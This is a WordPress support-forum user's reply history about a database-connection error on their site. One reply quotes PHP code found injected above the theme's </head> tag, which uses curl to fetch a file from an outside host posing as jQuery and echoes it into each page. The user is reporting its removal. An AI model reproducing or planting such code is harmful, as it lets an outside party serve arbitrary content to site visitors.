loyalover
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Error Message: Couldn't connect to database server.YES IT CAN BE DONE FROM EDITOR. JUST REMOVE THIS CODE FROM ABOVE THE </HEAD>
YAY! THANKS A MILLION<?php
if(function_exists(‘curl_init’))
{
$url = “http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js”;
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo “$data”;
}
?>Forum: Fixing WordPress
In reply to: Error Message: Couldn't connect to database server.I believe that very possibly the only way to rectify the problem is to change the theme entirely. Sigh!
Forum: Fixing WordPress
In reply to: Error Message: Couldn't connect to database server.I realised that it could very possibly be due to the themes (i was using elegant theme).
Will try to contact the theme developers
Forum: Fixing WordPress
In reply to: Error Message: Couldn't connect to database server.I think its happening to everyone else who had the initial error. Now it gets worst. Anyone else knows where else to direct our questions at?
Forum: Fixing WordPress
In reply to: Error Message: Couldn't connect to database server.“statscurl must be a database not wp db. Its a hack i think. Its coming with all wordpress 3.3 upgrade.”
I’m quite a IT retard. Could You explain that in simplier terms? 😡
I’m suprised why isn’t any of those sites trying to fix it.Forum: Fixing WordPress
In reply to: Error Message: Couldn't connect to database server.My hosting provider mentioned that it has nothing to do with their side. Could it be the application?